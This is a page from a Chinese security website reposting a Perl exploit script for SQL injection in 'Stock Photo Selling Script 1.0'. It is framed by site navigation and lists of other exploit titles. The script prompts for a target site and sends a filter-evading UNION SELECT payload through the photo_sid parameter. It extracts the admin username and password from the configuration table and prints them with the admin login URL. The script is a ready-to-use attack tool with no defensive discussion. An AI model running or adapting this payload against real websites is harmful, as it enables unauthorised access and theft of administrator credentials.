首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Stock Photo Selling 1.0 - SQL Injection
来源:http://ihsan.net 作者:Sencan 发布时间:2017-09-22  

#!/usr/bin/perl -w
# # # # #
# Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection
# Dork: N/A
# Date: 21.09.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: http://sixthlife.net/product/stock-photo-selling-website/
# Demo: http://www.photoreels.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
                   #### ##     ##  ######     ###    ##    ##
                    ##  ##     ## ##    ##   ## ##   ###   ##
                    ##  ##     ## ##        ##   ##  ####  ##
                    ##  #########  ######  ##     ## ## ## ##
                    ##  ##     ##       ## ######### ##  ####
                    ##  ##     ## ##    ## ##     ## ##   ###
                   #### ##     ##  ######  ##     ## ##    ##
 
             ######  ######## ##    ##  ######     ###    ##    ##
            ##    ## ##       ###   ## ##    ##   ## ##   ###   ##
            ##       ##       ####  ## ##        ##   ##  ####  ##
             ######  ######   ## ## ## ##       ##     ## ## ## ##
                  ## ##       ##  #### ##       ######### ##  ####
            ##    ## ##       ##   ### ##    ## ##     ## ##   ###
             ######  ######## ##    ##  ######  ##     ## ##    ##                                                                           
                 Stock Photo Selling Script 1.0 - SQL Injection          
################################################################################
";
use LWP::UserAgent;
print "\nInsert Target:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$tt="tbl_configurations";
$cc="(/*!00007SELECT*/%20GROUP_CONCAT(0x3c74657874617265613e,0x557365726e616d653a,admin_name,0x2020202020,0x50617373776f72643a,admin_password,0x3c2f74657874617265613e%20SEPARATOR%200x3c62723e)%20/*!00007FROM*/%20".$tt.")";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
$host = $target . "photo_view.php?photo_sid=-d1fe173d08e959397adf34b1d77e88d7'%20%20/*!00007UNION*/(/*!00007SELECT*/%200x283129,0x283229,0x283329,".$cc.",0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629)--%20-";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
print "[+] Success !!!\n";
print "\n[+] Admin Detail : $1\n";
print "\n[+]$target/admin/index.php?mod=login\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Edge Chakra - 'Javas
·DenyAll WAF < 6.3.0 - Remote C
·Microsoft Edge Chakra - 'Parse
·Cash Back Comparison Script 1.
·Microsoft Edge Chakra - Deferr
·CyberLink LabelPrint < 2.5 - B
·Microsoft Edge - Chakra Incorr
·Disk Pulse Enterprise 10.0.12
·Linux Kernel <= 4.13.1 - BlueT
·Supervisor 3.0a1 - 3.3.2 - XML
·Disk Pulse Enterprise 9.9.16 G
·Oracle 9i XDB 9.2.0.1 - HTTP P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved